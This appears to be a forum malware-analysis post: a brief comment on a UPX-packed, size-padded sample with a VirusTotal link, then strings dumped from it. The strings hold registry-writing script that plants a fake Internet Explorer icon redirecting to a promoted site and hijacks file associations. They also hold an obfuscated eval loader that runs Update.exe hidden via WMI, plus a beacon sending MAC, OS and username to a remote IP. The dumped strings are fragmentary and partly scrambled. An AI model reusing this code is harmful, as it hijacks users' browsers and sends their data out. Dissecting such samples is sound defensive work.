Not Arma, looks like scrambed UPX.
50+ Mb of nothing when actual size of this trash is ~200 Kb.
http://www.virustotal.com/file-scan/rep ... 1290316109
IconFile=C:\WINDOWS\Downloaded Program Files \\taobao.ico \\movie.ico \\mm.ico \\game.ico C:\WINDOWS\Downloaded Program Files\Update.exe .exe " "%s" C:\WINDOWS\Downloaded Program Files\mm.ico C:\WINDOWS\Downloaded Program Files\movie.ico C:\Program Files\Thunder\ComDlls\1143 C:\WINDOWS\system32\wscript.exe C:\Program Files\Thunder\Update.exe C:\Program Files\Thunder C:\Program Files\Internet Explorer\MUI C:\Program Files\Thunder\ComDlls\ .. . * \Жф¶Ї Internet Explorer дЇААЖч.lnk \Internet Explorer.lnk \ЛС№·ёЯЛЩдЇААЖч.lnk \КАЅзЦ®ґ°.lnk \Mozilla Firefox.lnk \360°ІИ«дЇААЖч 3.lnk \МЪС¶TT.lnk \°БУОдЇААЖч2.lnk \°БУО 3.lnk remove myself faile !
w try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\Open\\Command\\", "C:\\Program Files\\Internet Explorer\\Iexplore.exe http://www.788dh.com/","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\ShellFolder\\Attributes",10,"REG_DWORD");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\ShellFolder\\","","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\","Internet Exploer","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\КфРФ\\Command\\", "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\КфРФ\\", "КфРФ","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\Open\\", "ЙПНшЦчТі","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\D\\Command\\", "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\D\\", "Йѕіэ(&D)","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\Shell\\","","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\DefaultIcon\\", "C:\\Program Files\\Internet Explorer\\Iexplore.exe","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\{86AEFBE8-763F-0647-899C-A93278894D8E}\\","Internet Exploer","REG_SZ");}catch(e){}
try{P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\ClassicStartMenu\\{871C5380-42A0-1069-A2EA-08002B30309D}",1,"REG_DWORD");}catch(e){}
try{P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\NewStartPanel\\{871C5380-42A0-1069-A2EA-08002B30309D}",1,"REG_DWORD");}catch(e){}
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('(3(){0 9,10;0 17=3(){0 65=5.22;0 21=10.61(5.22,1);0 7=21.45();0 24=/20(.*?)20/23;0 26=/19(.*?)19/23;0 2=\'\',11=\'\';27(24.25(7)){2=28.$1;2=2.44(/\\\\/49,"\\\\\\\\");0 50="";27(26.25(7)){11=28.$1;18{9.43(\'"\'+2+\'" \'+\' \'+11,1,51)}31(63){}}}};0 14=3(){9=4 6(\'5.15\');10=4 6(\'16.29\')};14();17()})();0 60=4 6("5.15");0 54=4 6("16.29");18{0 36="56:\\\\58\\\\57 62 55\\\\52.53";33(36)}31(59){};3 33(38){0 32=12;0 34=39("40:{37=35}!\\\\\\\\.\\\\41\\\\30:66");0 8=34.64();8.67=32;0 13="";0 42=39("40:{37=35}!\\\\\\\\.\\\\41\\\\30:48");42.47(38,46,8,13)};',10,68,'var||a|function|new|WScript|ActiveXObject|fc|objConfig|_ws|_sf|b||intProcessID|Init|Shell|Scripting|RunLnkFile|try|____|___|f|ScriptFullName|ig|_o1|test|_o2|if|RegExp|FileSystemObject|cimv2|catch|HIDDEN_WINDOW|CreateWin32|WMI|impersonate|path|impersonationLevel|_1|GetObject|winmgmts|root|objProcess|Run|replace|ReadAll|null|Create|Win32_Process|g|_fkurl|false|Update|exe|q|Files|C|Downloaded|WINDOWS|E|P|OpenTextFile|Program|e|SpawnInstance_|sfn|win32_processstartup|ShowWindow'.split('|'),0,{})) ____
//____ ___
//___ </html>
</body>
<body>
</head>
<title></title>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<meta http-equiv="Content-Language" content="zh-CN">
<head>
"> <html>
<meta http-equiv="refresh" content="0.1;url= lnk C:\Documents and Settings\Administrator\ЧАГж\Internet Explorer.fon .fon .msm4 .clp .isi7 .dun isi3 .cer .isn3 .bkf .isn4 .aif .lnk .msn4 http://www.788dh.com fonfile\ScriptEngine fonfile\shell\open\command fonfile\DefaultIcon CRLfile\ScriptEngine CRLfile\shell\open\command CRLfile\DefaultIcon clpfile\ScriptEngine clpfile\shell\open\command clpfile\DefaultIcon dunfile\ScriptEngine dunfile\shell\open\command dunfile\DefaultIcon CERfile\ScriptEngine CERfile\shell\open\command CERfile\DefaultIcon msbackupfile\ScriptEngine msbackupfile\shell\open\command msbackupfile\DefaultIcon AIFFFile\ScriptEngine AIFFFile\shell\open\command AIFFFile\DefaultIcon fonfile CRLfile clpfile dunfile CERfile msbackupfile AIFFFile \..\..\Program Files\Internet Explorer\iexplore.exe Software\Microsoft\Internet Explorer\Main\Frist http://58.218.198.119:8080/count.asp?mac=%s&os=%s&flag=%s&user=%s %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x Microsoft Win32s Microsoft Windows Millennium Edition Microsoft Windows 98 Microsoft Windows 95 Microsoft Windows NT Microsoft Windows 2000 Microsoft Windows Server 2003 Microsoft Windows XP %02x-%02x-%02x-%02x-%02x %02x-%02x-%02x-%02x-%02x-%02x
